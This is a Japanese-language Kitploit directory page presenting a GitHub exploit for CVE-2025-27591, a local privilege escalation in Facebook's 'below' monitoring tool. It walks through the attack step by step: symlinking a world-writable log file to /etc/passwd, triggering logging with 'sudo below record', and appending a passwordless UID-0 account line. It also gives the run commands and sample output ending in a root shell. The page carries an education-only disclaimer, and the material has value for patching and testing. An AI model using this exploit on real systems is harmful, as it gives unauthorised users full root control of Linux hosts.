Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-27591 — 🔥 CVE-2025-27591 に対するローカル権限昇格エクスプロイト | Below のワールド書き込み可能なログディレクトリを悪用し、/etc/passwd インジェクションを介して root を取得する | Kitploit
ツール/GitHubGitHub/00xcanelo/cve-2025-27591
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 CVE-2025-27591 に対するローカル権限昇格エクスプロイト | Below のワールド書き込み可能なログディレクトリを悪用し、/etc/passwd インジェクションを介して root を取得する

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-27591 – belowにおけるシンボリックリンク悪用による権限昇格

Author CVE

🛑 免責事項: このエクスプロイトは教育目的および許可されたセキュリティテストのみのために提供されています。無断使用は違法となる可能性があります。


🧠 概要

below は Facebook が開発した Linux システム向けのパフォーマンス監視ツールです。パッチ適用前のバージョンの below は、全ユーザー書き込み可能なログディレクトリと未サニタイズのログ処理を悪用することで、非特権ユーザーが root に昇格できる重大な脆弱性の影響を受けます。


🔎 CVE 詳細

フィールド値
CVE-IDCVE-2025-27591
深刻度🔥 重大 (CVSS ≈ 7.8 - 8.8)
攻撃ベクトルローカル
影響root (UID=0) への権限昇格
エクスプロイトタイプシンボリックリンク悪用 / ログファイルインジェクション
影響を受けるアプリケーションbelow – 通常 /usr/bin/below にインストールされます
根本原因権限チェックなしで /var/log/below/ への安全でないファイル書き込み

💥 エクスプロイトロジック

この Bash スクリプトは以下の処理を行います:

  1. 全ユーザー書き込み可能ディレクトリの確認:

    • /var/log/below が全ユーザー書き込み可能かどうかを確認します(危険信号)。
  2. シンボリックリンク攻撃の準備:

    • 既存の error_root.log があれば削除し、/etc/passwd へのシンボリックリンクを作成します。
  3. ペイロードの構築:

    • /etc/passwd に偽の root ユーザーを追加します:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. ログのトリガー:

    • sudo below record を実行して、脆弱なバイナリにログを書き込ませます。
  5. root アクセスの獲得:

    • su fakeadmin を使用して、パスワードプロンプトなしで root シェルを取得します。

📁 ディレクトリ構造

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ 前提条件

エクスプロイトを実行する前に、以下の要件を満たしていることを確認してください:

  • Bash シェル (Linux システム)
  • 脆弱なバイナリがインストールされていること: /usr/bin/below
  • 全ユーザー書き込み可能なログディレクトリ: /var/log/below
  • 実行するための sudo 権限: sudo below record
  • 利用可能なツール:
    • ln (シンボリックリンク作成用)
    • su (ユーザー切り替え用)
    • timeout (実行時間制御用)
    • whoami (権限確認用)

🚀 エクスプロイト手順

root@kitploit:~
# 1. リポジトリをクローン
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. スクリプトに実行権限を付与
chmod +x exploit.sh

# 3. エクスプロイトを実行
./exploit.sh

🧪 サンプル出力

root@kitploit:~
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd

[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)

[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.

[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
ツールをダウンロード